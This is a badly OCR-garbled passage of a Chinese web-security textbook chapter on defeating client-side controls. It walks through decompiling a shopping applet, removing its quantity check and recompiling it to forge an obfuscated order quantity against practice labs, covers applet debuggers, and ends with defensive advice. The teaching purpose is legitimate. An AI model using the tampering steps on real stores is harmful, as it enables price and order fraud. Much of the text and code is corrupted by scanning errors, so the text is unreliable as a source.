要 实施 这 种 攻击 ， 需 要 对 在 相关 浏 唤 器 扩展 中 运行 的 原始 可 执行 
文件 进行 修改 ， 将 其 更 改 为 可 以 在 命令 行 中 运行 的 独立 程序 。 进 行 修 
改 的 方式 因 所 采用 的 编程 语言 而 异 。 例 如 ， 在 Java 中 ， 只 需要 实施 
main 方 法 。“Java applet: 可 用 示例 ”小 节 将 提供 相关 示例 。 

@ 使 用 JavaScript 探 纵 原始 组 件 

在 某 些 情况 下 ， 并 不 需要 修改 组 件 的 字 节 码 。 相 反 ， 可 以 通过 修 
改 HTML 页 面 中 与 组 件 交 互 的 JavaScript 来 达到 目的 。 

通过 查看 组 件 的 源 代 码 ， 可 以 确定 组 件 的 所 有 可 直接 从 JavaScript 
调用 的 公共 方法 ， 以 及 组 件 处 理 这 些 方法 的 参数 的 方式 。 通 常 ， 除 了 
可 以 从 应 用 程序 页 面 调用 的 方法 外 ， 还 存在 其 他 一 些 方法 ; 另外 ， 还 
能 够 了 解 有 关 这 些 方法 的 参数 的 用 途 及 处 理 方式 的 详细 信息 。 

例如 ， 组 件 可 能 会 公开 这 样 的 方法 : 调用 该 方法 可 以 启用 或 禁用 
部 分 可 见 的 用 户 界 面 。 使 用 拦截 代理 服务 器 可 以 编辑 加 载 该 组 件 的 


HTML 页面， 修改 其 中 的 JavaScrip 域 在 其 中 添加 一 些 JavaScript， 以 解 
锁 被 隐藏 的 部 分 界面 。 


渗透 测试 步骤 


(1) 使 用 上 述 技巧 下 载 组 件 的 字 节 码 ， 解 压 字 节 码 ， 然 后 将 
其 反 编译 成 源 代码 。 

(2) 查看 相关 源 代码 ， 了 解 组 件 的 执行 过 程 。 

(3) 如 果 组 件 包 含 任何 可 进行 操纵 以 实现 目的 的 公共 方法 ， 


可 以 拦截 与 该 组 件 交 互 的 HTML 了 响应， 并 在 其 中 添加 一 些 
JavaScript， 以 使 用 输入 调用 相应 的 方法 。 

(4) 如 果 组 件 中 不 包含 公共 方法 ， 可 以 通过 修改 组 件 的 源 代 
码 ， 重 新 编译 修改 后 的 代码 ， 然 后 在 浏览 絮 中 或 作为 独立 的 程序 执 
行 这 些 代码 ， 从 而 达到 目的 。 

(5) 如 果 组 件 用 于 向 服务 器 提交 模糊 或 加 密 数 据 ， 则 可 以 使 
用 修改 后 的 组 件 问 服务 絮 提 交 各 种 经 过 适当 模糊 处 理 的 攻击 字符 
串 ， 以 探查 其 中 的 漏洞 ， 就 像 针 对 任何 其 他 参数 实施 攻击 一 样 。 


4. 字 节 码 模 糊 处 理 

由 于 攻击 者 可 轻松 反 编 译 字 太 人 码 以 恢复 其 源 代码 ， 因 而 人 们 开发 
出 各 种 技巧 来 对 字 和 码 进行 模糊 处 理 。 经 过 模糊 处 理 的 字 和 和 码 更 难以 
反 编 译 ， 或 者 反 编 译 后 得 到 的 是 可 能 造成 误导 或 无 效 的 源 代码 ， 这 些 
代码 非常 难以 理解 ， 不 投入 大 量 精力 无 法 进行 重新 编译 。 以 下 面 经 过 
模糊 处 理 的 Java 源 代码 为 例 ; 


package myapp.interface; 


import myapp.class.public; 
import myapp. throw. throw; 
import if.if.if.if.else; 


import java.awt.event.KeyEvent; 
public class double extends public implements strict 
f 


public double(j j1) 


private void _mthif(ActionEvent actionevent) 


{ 
_mthif(((KeyEvent) (null))); 
switch(_fldif._ mthnew() ._fldif) 
{ 
case Q: 


_fldfloat.setEnabled(false); 
_fildboolean.setEnabled({false}); 
_fidinstanceof.setEnabled(false) ; 
_flidint.setEnabled(false); 

break; 


常用 的 模糊 处 理 技 巧 包括 以 下 几 种 。 

口 用 没有 意义 的 表达 式 (如 a、b、c) RAAB MH ` WIE A 
员 变 量 名 称 。 这 迫使 阅读 反 编译 代码 的 攻击 者 只 有 通过 人 研究 表达 式 的 
使 用 方法 才能 确定 它们 的 用 途 ， 因 此 他 们 很 难 明日 这 些 表达 式 的 作 
用 。 

口 更 进一步 ， 一 些 模糊 处 理工 具 用 new 和 int 之 类 的 保留 关键 字 代 
从 项 目 名 称 。 虽 然 从 技术 上 讲 ， 这 种 字 节 码 是 非法 的 ， 但 大 多 数 虚 拟 
机 (VM) 允许 使 用 这 种 非法 代码 ， 并 正常 执行 它们 。 不 过 ， 尽 管 反 
编译 如 能 够 处 理 非法 字 市 码 ， 但 这 样 得 到 的 源 代码 比 前 一 种 方法 生成 
的 源 代码 更 加 难以 阅读 。 更 重要 的 是 ， 如 采 不 投入 大 量 精力 对 非法 命 
名 的 数据 项 统一 进行 重 命名 ， 束 不 能 重新 编译 源 代 码 。 


口 许多 模糊 处 理工 具 删 除 字 市 码 中 不 必要 的 调试 和 元 信息 ， 包 括 
源 文件 名 和 行 号 (使 栈 追 踪 缺 乏 信 息 ) 、 局 部 变量 名 称 〈 使 调试 更 碎 
烦 ) 和 内 部 类 信息 〈 使 反射 无 法 正常 进行 ) 。 

口 增加 多 余 的 代码 ， 以 看 似 有 用 的 方式 建立 并 处 理 各 种 数据 ， 但 
它们 与 应 用 程序 的 功能 实际 使 用 的 数据 并 无 关系 。 

口 使 用 跳 转 指令 (jump instruction) 对 整个 代码 的 执行 路 径 进 行 令 
人 费解 的 修改 ， 致 使 攻击 者 在 阅读 反 编译 得 到 的 源 代码 时 无 法 判别 执 
行 代码 的 逻辑 顺序 。 

口 引入 非法 的 编程 结构 ， 如 无 法 到 达 的 语句 和 缺少 return 语 句 的 代 
码 路 径 。 大 多 数 VM 人 允许 在 字 市 码 中 出 现 这 种 结构 ， 但 如 采 不 更 正 非 
法 代码 ， 束 无 法 重新 编译 反 编码 得 到 的 源 代码 。 


渗透 测试 步骤 


应 对 字 节 码 模糊 处 理 的 有 效 策 略 取决 于 所 分 析 的 源 代 码 使 用 的 
技巧 和 目的 。 以 下 提供 一 些 建议 。 
(1) 不 必 完 全 理解 源 代 码 ， 只 需 查看 组 件 中 是 否 包含 公共 方 
法 。 哪 些 方法 可 以 从 JavaScript 中 调用 ， 它 们 的 签名 是 什么 ， 这 些 内 
容 应 显而易见 。 可 以 通过 提交 各 种 输入 测试 上 述 方法 的 行为 。 
(2) 如 果 已 经 使 用 无 意义 的 表达 式 (并 非 编 程 语言 保留 的 特 


殊 关 键 字 ) 代替 类 、 方 法 和 成 员 变量 名 称 ， 可 以 使 用 许多 IDE 中 内 
置 的 重 构 功能 (refactoring functionality) 帮助 理解 代码 。 通 过 人 研究 
数据 的 用 法 ， 可 以 给 它们 分 配 有 意义 的 名 称 。IDE 中 的 rename 工 具 
可 以 帮助 完成 许多 工作 ， 在 整个 代码 库 中 追踪 数据 的 用 法 并 对 每 一 
个 数据 进行 重 命 名 。 
(3) 选择 适当 的 选项 ， 在 模糊 处 理工 具 中 再 次 对 模糊 处 理 后 

的 字 节 码 进行 模糊 处 理 ， 这 样 即 可 撤销 许多 模糊 处 理 。Jode 是 一 种 
实用 的 模糊 处 理工 具 ， 它 可 删除 由 其 他 模糊 处 理工 具 添 加 的 多 余 代 
ee 并 可 为 数据 分 配 唯一 的 名 称 ， 为 理解 模糊 处 理 后 的 名 称 提 
KAHN ° 


5. Java applet: 可 用 示例 
下 面 以 一 个 在 Java applet 中 执行 输入 确认 的 购物 应 用 程序 为 例 ， 人 簿 
BURA MIA Be as PED Ba) 展 $ 


form n i="post" act p.aspx?prod=2" onsubmit="retur 
validaterorm(this}"> 
<input type="hidden" name="obfpad" 


value="k1GSE8X9x0WFv9KGai lePdqaxHIsU5RnojwPdBRgZuixXSB3TgkupaPig3 


UOm8C IPSHIUxpidrPOuQPwé 3 ogZ2vby L0OevPrkxPiuUxA8Gn30clep2Lax6bIyuyEU 


function validatePorm( therorm) 


var obfcuantity = 
document. CheckQuantityApplet.doCheck i 

theForm.cuantity.value, theForm.sbfpad.value); 
a 


if (obfguantity == undefined) 
alert('Please enter a val quantity. ') 
r urn alse 
theForm.qcuantity.value = obfcuantity; 
T Y 2 y 
return true; 
} 
</script> 
“applet code="CheckQuantity.class* codebase="/scripts" width="0" 


heighr="0" 
id="*CheckQuantityApplet*></applet> 
Product: Samsung Multiverse <br/> 
Price: 399 <br/> 
Quantity: <input type="text” name="quantity’> (Maximum quantity is 50) 
<br/> 
<input type="submit" value="Buy"> 
</form> 


以 数量 2 提交 该 表单 时 ， 请 提出 以 下 请 求 : 
POST /shop/154/Shop.aspx?prod-2 HTTP/1i.1 
Host: mdsec.net 
Content-Type: application/x-www-form-urlencoded 


Content-Length: 77 
obfpad=*1GSBSX9x0WFW93 KGqi lePdqaxHIsUSRnojwPd3kg7u i XSB3Tgkuparigs UQmBCTPS 
HOxpidrPoug 

Pw630gZ2vbyiCevPrkxF iuUxA8Gn30olep2Laxé6lyuyEUD9SmG7céaquantity=4b282c510£ 
776a405f465 


如 以 上 HTML 代 码 所 示 ， 提 交 表 单 时 ， 确 认 脚 本 会 同一 个 名 为 
CheckQuantity 的 Java applet 传 递 用 户 提 供 的 数量 和 obfpad 参 数 的 值 。 很 
明显 ，applet 会 执行 必要 的 输入 确认 ， 并 加 脚本 返回 经 过 模糊 处 理 的 数 
量 ， 然 后 脚本 再 将 该 数量 提交 给 服务 器 。 

由 于 服务 器 端 应 用 程序 确认 订购 数量 为 两 件 ， 因 此 ， 很 明显 ， 
quantity 参 数 会 以 某 种 形式 包含 我 们 请 求 的 值 。 但 是 ， 如 果 我 们 尝试 在 
不 了 解 模 糊 算 法 的 情况 下 修改 该 参数 ， 攻 击 将 会 失败 ， 因 为 服务 器 无 
法 正确 解析 我 们 提交 的 经 过 模糊 处 理 的 值 。 

在 这 种 情况 下 ， 可 以 使 用 之 前 介绍 的 方法 反 编译 Java applet， 以 此 
了 解 它 的 工作 机 制 。 首 先 ， 需 要 从 HTML 页 面 的 applet 标 签 中 指定 的 
URL 下载 applet 的 字 节 码 : 


/scripts/CheckQuantity.class 


由 于 可 执行 文件 没有 打包 成 jar 文 件 ， 因 此 ， 不 需要 解压 这 个 文 
件 ， 可 以 直接 到 下 载 的 .class 文 件 运 行 Jad: 


C:\tmp>jad CheckQuantity.class 


Parsing CheckQuantity.class...The class file version is 50.0 
46.0 ana 47.0 are supported) 
Generating CheckQuantity.jad 


Couldn't fully decompile method doCheck 


{only 45.3, 


Couldn't resolve all exception handlers in method doCheck 


Jad 将 经 过 反 编译 的 源 代码 输出 为 jad 文 件 ， 可 以 在 任意 文本 编辑 
ae PEA MF: 


// Decompiled by Jad v1.5.8£. Copyright 2001 Pavel Kouznetsov. 
// Jad nome page: http://www. kpdus.com/jad. html 

// Decompiler options: packimports (3) 

// Source File Name: CheckQuantity. java 


import java.applet.Applet; 


public class CheckQuantity extends Applet 
{ 


public CheckQuantity{) 
} 
public String doCheck[{String s, String s1) 


int i = 0; 
i = Integer.parseInt({s); 
if{i <= 0 || i > 50) 

return null; 
break MISSING _BLOCK_LABEL_26; 
Rxception exception; 
exception; 


return null; 

String s2 = (new StringBuilder()).append{*rand-") .append 
(Math.random()).append("&q="). append (Integer. toString(i)).append 
("&checked=true"} .toString(}); 

StringBuilder stringbuilder = new StringBuilder (); 

for(int j = 0; j < s2.length(); j++) 

{ 

String s3 = (new StringBuilder{})).append('0').append 
(Integer.toHexString( (byte}si.charAt((j * 19 + 7) % si.length{}} ^ 
s2.charAt(j))).toString(); 

int k = s3.length(); 

if{k > 2) 

83 = s3.substring(k - 2, k); 
stringbuilder.append(s3}; 


return stringbuiider.teString(); 
} 


如 经 过 反 编 译 的 源 代码 所 示 ，Jad 进 行 了 大 量 的 反 编译 工作 ， 而 且 
该 applet 的 源 代 码 非常 简单 。 使 用 用 户 提供 的 quantity 参 数 和 应 用 程序 
提供 的 obfpad 参 数 调用 doCheck 方 法 时 ，applet 首 移 人 确认 该 数量 是 否 为 
介 于 1 到 50 之 间 的 有 效 数字 。 如 采 数 字 有 效 ， 它 会 使 用 URL 查 询 字 符 串 


格式 创建 一 个 由 名 / 值 对 组 成 的 字符 第 ， 在 其 中 包含 经 过 确认 的 数量 。 
最 后 ， 它 使 用 应 用 程序 提供 的 obfpad 字 符 串 对 以 上 创建 的 字符 串 执 行 
XOR 操 作 ， 对 该 字符 串 进 行 模糊 处 理 。 这 古 一 种 相当 人 简单 而 常用 的 方 
法 ， 它 通过 对 数据 进行 基本 的 模糊 处 理 来 防止 简单 的 竹 改 操作 。 

关于 如 何 反 编译 和 分 析 浏 贤 右 扩展 组 件 的 源 代 码 ， 我 们 已 经 介绍 
了 各 种 方法 。 在 此 示例 中 ， 解 本 applet 的 最 位 单方 法 如 下 所 示 : 

(1) 修改 doCheck 方 法 ， 取 消 输 入 确认 ， 以 便于 将 任意 字符 串 作 
FY PUB GE ICL ARF a 

(2) 添加 一 个 main 方 法 ， 用 于 从 命令 行 执行 经 过 修改 的 组 件 。 该 
方法 将 调用 经 过 修改 的 doCheck 方 法 ， 并 在 控制 台 打 印 经 过 模糊 处 理 
HJER © 

进行 这 些 更 改 后 ， 源 代码 如 下 所 示 : 


rPOu0Pw6 3007 2vbyiOevPrkxFiuUxA8Gn300lep2Lax6TyuyEUDS SmG7c") 


public static String doCheck(String s, String sl) 


{ 
String s2 {new StringBuilder ()).append({("rand=") .appena 
(Math. random{)) .append{"&q=") .append(s) .append 


("&checked=true”"}.toString(); 
StringBuilder stringbuilder = new StringBuilder(}; 
for(int j = 0; j < s2.length(); j++) 


( 


String s3 (new StringBuilder!)) .append{'0'). append 
(Integer. toHexString({{(byte)si.charAc(({j * 19 + 7) % sl.jiength{)) ^ 
s2.charAt(j)))}.toString{); 


int k = s3.lenqth(); 
LEIR > 2) 
$3 = s3.substring(k 2, K); 


stringbui léer. append (s3}; 


return stringbuilder.toString({); 


经 过 修改 的 组 件 以 任意 数量 (999) 提供 经 过 模糊 处 理 的 有 效 字符 
串 。 需 要 注意 的 是 ， 可 以 在 此 处 使 用 非 数字 输入 ， 探 查 应 用 程序 中 是 
否 存在 各 种 基于 输入 的 漏洞 。 


YV ”提示 Jad 程 序 以 jad 扩展 名 保存 其 反 编译 的 源 代码 。 但 是 ， 


i tn lero tae a 
件 。 


最 后 ， 需 要 使 用 Java SDK 目 读 的 javac 编 译 属 重新 编译 源 代码 ， 然 
后 从 命令 行 执行 经 过 修改 的 组 件 : 


C: \tmp> javac CheckQuant ity.jav 
C:\tmp>java CheckQuantity 
4b282c510f776a45Sd425a7B08015c555F42585460464d1e42684c414alS2bledbSa520e 


现在 ， 经 过 修改 的 组 件 已 对 我 们 提交 的 任意 数量 (999) 进行 了 必 
要 的 模糊 处 理 。 要 对 服务 器 实施 攻击 ， 只 需 使 用 有 效 的 输入 以 正常 方 
式 提交 订单 ， 使 用 代理 服务 器 拦截 生成 的 请 求 ， 并 用 经 过 修改 的 组 件 
提供 的 数量 奉 换 经 过 模糊 处 理 的 数量 。 需 要 注意 的 是 ， 如 采 应 用 程序 
在 每 次 加 载 订单 时 都 发 布 一 个 新 的 模糊 包 (obfuscation pad) ， 需 要 确 
te eee ee ee 
糊 包 相 匹配 。 


尝试 访问 


以 下 示例 演示 了 上 述 攻 击 以 及 使 用 Silverlight 和 Flash 技 术 的 对 应 
击 : 


http://mdsec.net/shop/154/ 
http://mdsec.net/shop/167/ 
http://mdsec.net/shop/179/ 


5.3.5 ”附加 调试 器 


要 了 解 和 攻击 浏览 器 扩 展 ， 反 编译 是 最 全 面 可 靠 的 方法 。 但 是 ， 
对 于 包含 成 千 上 万 行 代码 、 功 能 复杂 的 大 型 组 件 而 言 ， 观 察 组件 的 执 
行 过 程 ， 并 将 其 中 的 方法 和 类 与 界面 中 的 关键 功能 进行 关联 ， 往 往 会 
更 加 简单。 而 且 ， 采 用 这 种 方法 还 可 以 避免 在 解释 和 反 编 译 经 过 模糊 
处 理 的 字 节 码 时 遇 到 的 困难 。 通 常 ， 只 需要 执行 某 项 天 键 功能 ， 更 改 
其 行为 ， 以 消除 在 组 件 中 实施 的 控件 ， 即 可 达到 特定 目的 。 

由 于 调度 器 在 字 节 码 级 别 运行 ， 因此， 可 以 使 用 调试 器 轻松 控制 
并 了 解 组 件 的 执行 过 程 。 具 体 而 言 ， 如 果 可 以 通过 反 编 译 获 得 源 代 
码 ， 驶 可 以 在 特定 的 代码 行 设置 断 点 ， 并 通过 观察 组 件 在 执行 过 程 中 
采用 的 代码 路 径 来 判定 通过 反 编 译 获得 的 信息 是 否 正确 。 

虽然 针对 所 有 浏览 絮 扩 展 技术 的 高 效 调试 器 沿 不 成 熟 ， 但 Java 
applet 能 够 为 调度 提供 有 效 支 持 。JavaSnoop 是 目前 最 高 效 的 调度 絮 。 
JavaSnoop 是 一 蒜 Java 调 试 絮 ， 它 能 够 与 Jad 集 成 ， 以 用 于 反 编 译 源 代 
码 、 在 应 用 程序 中 跟踪 变量 ， 并 在 方法 中 设置 断 点 来 查看 和 修改 参 
数 。JavaSnoop 可 用 于 直接 “ 钧 住 ” 在 浏览 妖 中 运行 的 Java applet (如 图 5- 
6 所 示 ) ， 并 可 用 于 算 改 方法 的 返回 值 《如 图 5-7 所 示 ) 


“Add ee oe ee 


Class: (TradeApp 


| 
Method: [int StockSelector(Stingh 


int EventSelected(String) 
int UlLaunch(String) 

void HelperUL(String) 
void LoginHelper (String) 


[F] Apply rule to subclasses | Search for function... 
图 5-6 JavaSnoopF] U BIZE” $ 


浏览 器 中 运行 的 Java applet 


I jsnocp | 
File Cless Management Sonpting Settings Heip 

Target Program Seto Ratus 

oe 2 SNOOPING 

E 


Season limane: 


(ret saved yes) 


L è Codis 


rades Perecteter Opersxr CFA 


@ Amaye hook Hook F Cont hook F Ass Cang son 
Conscle | pecoriea Cocke | 
(20180 20 24:36:57 Retan vale meere roost from TreoedcAoe actin’) 
Edit return value 
Go: TradcApp 
Method: @etUID 
T Run antam aero 
Ream raue 
bdtSorpk | 
T fanor wh reisn vate 


Pause xogar 


Sent agent updated rules at 2:38: $1 PM 


Accept changes and daable hock |  Acceptchanges | 
图 5-7 ”确定 适当 的 方法 后 ， 可 以 使 用 JavaSnoop 和 修改 方法 的 返回 值 


g 注解 ”在 加 载 目标 applet 之 前 ， 最 好 首先 运行 JavaSnoop ° 
JavaSnoop 将 取消 Java 安 全 策略 设置 的 限制 ， 以 便于 针对 目标 执行 操 


作 。 在 Windows 中 ，JavaSnoop 通 过 同系 统 中 的 所 有 Java 程 序 授予 各 
种 权限 来 取消 限制 ， 因 此 ， 在 执行 操作 后 ， 需 要 确保 完全 关闭 
JavaSnoop 并 恢复 相关 权限 。 


JSwat 是 另 一 个 Java 调 试 工具 ， 该 工具 提供 大 量 配 置 选项 。 有 时 ， 
在 包含 许多 类 文件 的 大 型 项 目 中 ， 最 好 是 反 编 译 、 修 改 并 重新 编译 天 
键 的 类 文件 ， 然 后 使 用 JSwat 将 其 “ 热 包 装 ” 到 正在 运行 的 应 用 程序 中 。 
要 使 用 JSwat， 需 要 使 用 JDK 中 的 appletviewer 工 具 局 动 一 个 applet， 然 
后 将 JSwat 连 接 到 该 applet。 例 如 ， 可 以 使 用 以 下 命令 : 


appletviewer -J-Xdebug -J-Djava.compiler=NONE -J 
Xrunjdwp: transport=dt_socket, 
server=y, suspend=n,address=5000 appletpage.htm 


处 理 Silverlight 对 象 时 ， 可 以 使 用 Silverlight Spy 工具 监视 组 件 在 运 
行 时 的 执行 情况 。 在 将 相关 代码 路 径 关 联 到 用 户 界 面 中 的 事件 时 ， 该 
工具 可 提供 很 大 的 帮助 。 下 载 Silverlight Spy 的 URL 如 下 所 示 : 


http ://firstfloorsoftware.con/S ilverlightSpy/ 


5.3.6 ”本 地 组 


一 些 应 用 程序 需要 在 用 户 的 计算 机 中 执行 基于 浏 贤 絮 的 VM 沙 使 
oo 的 操作 。 根 据 客户 端 安全 控制 ， 以 下 是 这 类 功能 的 一 些 示 
列 : 

口 验证 用 户 是 否 装 有 最 新 的 病毒 扫 摘 屁 ; 

口 验证 代理 服务 絮 设 置 及 其 他 企业 配置 是 否 有 效 ; 

o RKA BE KERA ° 

通常 ， 这 些 操作 需要 使 用 本 地 代码 组 件 ， 这 些 组 件 将 集成 本 地 应 
用 程序 功能 和 和 Web 应 用 程序 功能 。 本 地 客户 端 组 件 一 般 通 过 ActiveX 控 
件 传 送 。ActiveX 控 件 是 在 浏览 絮 沙 盒 以 外 运行 的 定制 浏览 器 扩展 。 

由 于 没有 对 应 的 中 间 字 节 码 ， 相 比 于 其 他 浏 咒 器 扩展 ， 解 译本 地 
客户 端 组 件 要 困难 得 多 。 但 是 ， 我 们 在 避 开 客户 端 控 件 时 采用 的 方法 
对 于 本 地 客户 端 组 件 仍然 适用 ， 不 过 ， 这 时 需要 采用 一 组 不 同 的 工 
具 。 以 下 是 用 于 完成 这 个 任务 的 一 些 常 用 工具 : 


口 OllyDbg 是 一 个 可 用 于 裔 历 本 地 可 执行 代码 、 设 置 断 点 ， 并 在 磁 
盘 上 或 在 运行 时 对 可 执行 文件 应 用 补丁 的 Windows 调 斌 器。 

OIDA Pro 是 一 个 反 汇编 程序 ， 它 可 以 将 大 量 平台 上 的 本 地 可 执行 
代码 反 汇编 成 人 类 可 读 的 汇编 代码 。 

虽然 我 们 不 会 在 本 书 中 详细 介绍 有 关 逆 同 工 程 的 信息 ， 但 是 ， 如 
果 你 希望 详细 了 解 逆 向 工程 本 地 代码 组 件 及 相关 主题 ， 下 面 是 一 些 有 
用 的 资源 : 
DQ Reversing: Secrets of Reverse Engineering, Eldad Eilam 车 ; 
OQ Hacker Disassembling Uncovered, Kris Kaspersky ; 
I The Art of Software Security Assessment, Mark Dowd ` John 
McDonald 和 Justin Schuh % ; 
OD Fuzzing for Software Security Testing and Quality Assurance 
(Artech House Information Security and Privacy), Ari Takanen ` Jared 
DeMott 和 Charlie Miller ; 

The IDA Pro Book: The Unofficial Guide to the World's Most 
Popular Disassembler, Chris Eagle3 111; 

a www.acm.uiuc.edu/sigmil/RevEng ; 

o www.uninformed.org/?v=1&a=7 ° 


5.4 ”安全 处 理 客 户 端 数据 


如 前 所 述 ， 由 于 客户 端 组件 和 用 户 输入 不 在 服务 大 的 直接 控制 范 
内 ，Web 应 用 程序 的 核心 安全 面临 威胁 。 客 户 端 及 其 提交 的 所 有 数 
据 从 本 质 上 讲 都 不 值得 信任 。 


5.4.1 通过 客户 端 传送 数据 


许多 应 用 程序 之 所 以 存在 缺陷 ， 是 因为 它们 通过 客户 端 以 危险 的 
方式 传送 产品 价格 和 折扣 率 之 类 的 重要 数据 。 

如 果 可 能 ， 应 用 程序 应 完全 避免 通过 客户 端 传送 这 类 数据 。 在 几 
乎 任何 一 种 可 能 出 现 的 情况 下 ， 都 可 以 将 这 类 数据 保存 在 服务 左上， 
并 在 必要 时 通过 服务 器 端 逻辑 直接 引用 。 例 如 ， 接 受用 户 购 买 各 种 产 
品 而 提交 的 订单 的 应 用 程序 应 允许 用 户 提交 产品 代码 和 数量 ， 并 在 服 
务 器 端 数 据 库 中 查询 每 一 种 产品 的 价格 。 用 户 没 有 必要 同 服 务 器 提交 
产品 价格 。 即 使 应 用 程序 向 不 同 的 用 户 提 供 不 同 的 价格 或 折扣 ， 也 不 
必 抛 弃 这 种 模型 。 价 格 可 按 用 户 分 类 保存 在 数据 库 中 ， 而 折扣 率 则 保 
存在 用 户 资 料 或 会 话 对 象 中 。 应 用 程序 已 经 拥有 计算 某 一 特殊 用 户 所 
购买 的 某 种 产品 的 价格 所 需 的 一 切 信 息 在 不 安全 的 模型 中 ， 它 必 
须 (除非 无 法 做 到 ) 将 这 个 价格 保存 在 一 个 隐藏 的 表单 字段 中 。 

如 果 开 发 者 认为 他 们 别 无 选择 ， 只 有 通过 客户 端 传送 重要 数据 ， 
那么 应 当 对 数据 进行 签名 与 /或 加 密 处 理 以 防止 用 户 自 改 。 采 用 这 种 操 
作 还 必须 避免 两 个 重要 的 威胁 。 

口 签名 或 加 密 数 据 可 能 易 受 重 传 攻 击 (replay attack) 。 例 如 ， 如 
果 在 将 价格 保存 到 隐 减 表单 之 前 对 其 进行 加 密 ， 攻 击 者 就 可 以 用 一 个 
更 加 便宜 的 产品 的 加 密 价 格 代 巷 最 初 的 产品 价格 。 为 防止 这 种 攻击 ， 
应 用 程序 需要 在 加 密 数 据 中 包含 足够 的 上 下 文 ， 以 防止 攻击 者 在 男 一 
种 情况 下 重新 传送 产品 价格 。 例 如 ， 应 用 程序 可 以 将 产品 代码 和 价格 
组 合 在 一 起 ， 将 得 到 的 字符 串 单 独 加 密 ， 然 后 确认 随 订单 提交 的 加 密 
字符 串 是 否 与 被 订购 的 产品 完全 匹配 。 

口 如 果 用 户 知 道 并 /或 能 够 控制 送 交 给 他 们 的 加 密 字 符 串 的 明文 
值 ， 那 么 他 们 束 可 以 实施 各 种 密码 攻击 ， 找 出 服务 絮 使 用 的 加 密 密 
ee le , Ei RET A Ae EB, EEREN PR RY 


对 于 在 ASPNET 平 台 上 运行 的 应 用 程序 而 言 ， 建 议决 不 要 将 任何 
定制 数据 以 及 任何 你 不 希望 在 屏幕 上 向 用 户 显 示 的 敏感 数据 保存 在 
ViewState 中 。 应 总 是 激活 用 于 局 用 ViewState MAC 的 选项 。 


5.4.2 ”确认 客户 端 生成 的 数据 


人 

尖 的 数据 « 

口 可 轻易 避 开 HTML 表 单字 段 和 JavaScript 之 类 的 轻 量 级 客户 端 控 

件 ， 无 法 保障 服务 器 收 到 的 输入 的 安全 性 。 

口 在 浏览 器 扩展 组 件 中 执行 的 控件 有 时 更 难以 避 开 ， 但 这 种 控件 

只 能 暂时 阻止 攻击 者 入 侵 。 

口 使 用 经 强化 模糊 处 理 或 压缩 的 客户 端 代码 增添 了 另 一 层 障 碍 ， 

但 是 ， 鞭 意 攻击 者 还 是 能 够 克服 这 些 障碍 。 (其 他 领域 的 类 似 处 理 是 

使 用 DRM 技 术 防 止 用 户 复 制 数 字 媒 体 文件 。 许 多 公司 在 客户 端 控 件 上 

投入 大 量 资金 ， 但 每 一 种 新 型 解决 方案 通常 在 不 久 后 就 被 攻破 。) 
确认 客户 端 生成 数据 的 唯一 安全 方法 是 在 应 用 程序 的 服务 器 端 实 

施 保护 。 客 户 端 提交 的 每 一 项 数据 都 应 被 视 为 危险 和 潜在 恶意 的 。 


ant 


Q MA 有 时候 ， 人 入 们 认为 使 用 任何 客户 端 控件 必然 全 


造成 不 利 影 响 。 一 些 专业 渗透 测试 员 甚 至 把 使 用 客户 端 控件 看 
作 是 一 个 “重大 发 现 "， 并 不 检验 服务 器 是 否 使 用 这 些 控件 或 者 
使 用 它们 有 是否 出 于 非 安全 考虑 。 实 际 上 ， 尽 管 本 章 描述 的 各 种 
攻击 能 够 产生 挛 重 的 安全 警告 ， 但 在 许多 情况 下 使 用 客户 端 控 


件 并 不 会 造成 任何 安全 漏洞 。 

口 客户 端 脚本 可 用 于 确认 输入 ， 以 提高 可 用 性 ， 避 免 与 服务 大 
来 回 通信 。 例 如 ， 如 采用 户 输入 的 出 生日 期 格式 不 正确 ， 通 过 客户 
问 脚 本 向 他 们 提出 警报 可 提供 更 加 无 颖 的 使 用 体验 。 当 然 ， 应 用 程 
序 必须 对 之 后 提交 给 服务 器 的 数据 进行 重新 确认 。 

口 有 些 时 候 ， 客 户 端 数据 确认 可 以 与 安全 措施 一 样 有 效 一 一 例 
如 ， 通 过 它 防御 基于 DOM 的 跨 站 点 脚本 攻击 。 但 是 ， 许 多 时 候 攻 击 
的 直接 目标 是 另 一 名 应 用 程序 用 户 ， 而 不 是 服务 需 端 应 用 程序 。 而 
且 ， 利 用 洲 在 的 调 洞 不 一 定 需要 加 服务 做 传送 任何 恶意 数据 。 请 参 
阅 第 12 章 和 第 13 草 了 解 有 关 这 种 情形 的 详细 内 容 。 


口 如 前 所 述 ， 有 许多 方法 可 通过 客户 端 传送 加 密 数据 ， 而 不 会 
遭 到 破坏 或 重 传 攻击 。 


5.43 日 志 与 警报 


虽然 应 用 程序 采用 长 度 限 制 和 基于 JavaScript 的 确认 之 类 的 机 制 来 
提高 性 能 与 可 用 性 ， 但 这 些 机 制 应 与 服务 右 端 入 侵 检测 防御 工具 组 合 
使 用 。 对 客户 端 提交 的 数据 进行 确认 的 服务 如 端 逻辑 应 认识 到 ， 客 户 
端 也 采用 了 同样 的 确认 机 制 。 如 采 服 务 器 收 到 已 被 客户 端 阻止 的 数 
据 ， 应 用 程序 可 能 会 据 此 推 上 新 ， 一 名 用 户 正 设法 避 开 这 种 确认 ， 因 此 
这 些 数 据 可 能 是 恶意 的 。 应 用 程序 应 将 异常 记录 到 日 志 中 ， 适 当 情 况 
下 回应 用 程序 管理 员 发 出 实时 和 警报， 以 便 他 们 能 够 监控 任何 攻击 企 
图 ， 并 在 必要 时 采取 适当 的 行动 。 应 用 程序 还 会 主动 采取 防御 措施 ， 
终止 用 户 会 话 或 者 暂时 冻结 其 账户 。 


T 注解 有 些 时 候 ， 虽然 用 户 的 浏览 器 禁用 JavaScript， 但 他 
们 仍然 能 够 使 用 采用 JavaScript 的 应 用 程序 。 出 现 这 种 情况 ， 主 要 是 


因为 浏览 器 完全 忽略 了 基于 JavaScript 的 表单 确认 代码 ， 提 交 的 是 用 
户 输 入 的 原始 信息 。 为 避免 错误 警报 ,日志 与 警报 机 制 应 了 解 这 种 
情况 会 在 什么 地 方 出 现 ， 会 如 何 发 生 。 


5.5 小结 


几乎 所 有 的 客户 端 -服务 器 应 用 程序 都 必须 接受 这 样 一 个 事实 ， 即 
客户 端 组 件 和 其 中 发 生 的 所 有 处 理 过 程 都 不 像 我 们 期 和 的 那样 值得 信 
任 。 如 前 所 述 ， 如 果 应 用 程序 使 用 “透明 的 ”通信 方法 ， 那 么 即使 经 验 
尚 栈 的 攻击 者 使 用 人 简单 的 工具 都 能 轻易 避 开 客户 端 执 行 的 大 多 数控 
